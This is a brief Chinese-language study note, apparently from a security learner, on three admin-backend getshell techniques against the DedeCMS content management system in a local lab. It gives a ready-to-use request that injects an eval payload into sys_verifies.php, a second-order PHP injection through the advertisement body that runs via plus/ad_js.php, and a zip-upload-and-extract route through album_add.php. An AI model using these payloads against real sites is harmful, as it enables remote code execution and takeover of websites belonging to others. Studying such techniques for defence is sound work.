1、通過fopen/fwrite配合require_once文件包含進行getshell
D:\phpstudy_pro\WWW\dede\dede\sys_verifies.php
payload:http://dede.com/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//
此處進行文件包含,最終導致getshell
http://dede.com/dede/sys_verifies.php?action=down&a=echo 'zpchcbd';
類似的漏洞還有:D:\phpstudy_pro\WWW\dede\dede\stepselect_main.php 中的WriteEnumsCache函數
2、二次注入導致的getshell
D:\phpstudy_pro\WWW\dede\dede\ad_add.php
進行廣告添加的時候,其中$normbody
變量是我們可以可控,這里直接寫入的內容為--><?php phpinfo()?><!--
后面發現會進行取出,如果看從哪里取出呢?全局搜索#@__myad
,這個表的相關操作
D:\phpstudy_pro\WWW\dede\plus\ad_js.php,發現在這會進行取出,並且進行文件包含,--> <!--
就是為了閉合操作
然后訪問:http://dede.com/plus/ad_js.php?aid=3
,這里我的廣告id為3
直接命令執行
3、壓縮包上傳解壓導致的getshell
隨意上傳一個附件:http://dede.com/uploads/soft/200420/1_2312144661.zip
訪問:http://dede.com/dede/album_add.php
,進行解壓操作!
這三種都是經典的后台getshell的方法,在這里學習記錄下!